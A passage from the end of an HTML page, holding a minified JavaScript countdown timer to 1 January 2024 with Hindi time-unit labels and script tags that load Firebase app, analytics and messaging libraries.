var countDownDate=new Date("January 01, 2024 00:00:00").getTime(),x=setInterval(function(){var e=(new Date).getTime(),o=countDownDate-e,t=Math.floor(o/864e5),n=Math.floor(o%864e5/36e5),a=Math.floor(o%36e5/6e4),l=Math.floor(o%6e4/1e3);document.getElementById("demo").innerHTML=+t+"<font color='red'> दिन,</font> "+n+"<font color='red'> घंटे,</font> "+a+"<font color='red'> मिनट,<br></font> "+l+"<font color='red'>  सेकेंड  </font>पहले",o<0&&(clearInterval(x),document.getElementById("demo").innerHTML="")},1e3);
</script>
<script src="https://www.gstatic.com/firebasejs/8.2.2/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.2.2/firebase-analytics.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.2.2/firebase-messaging.js"></script>




</body>



</html>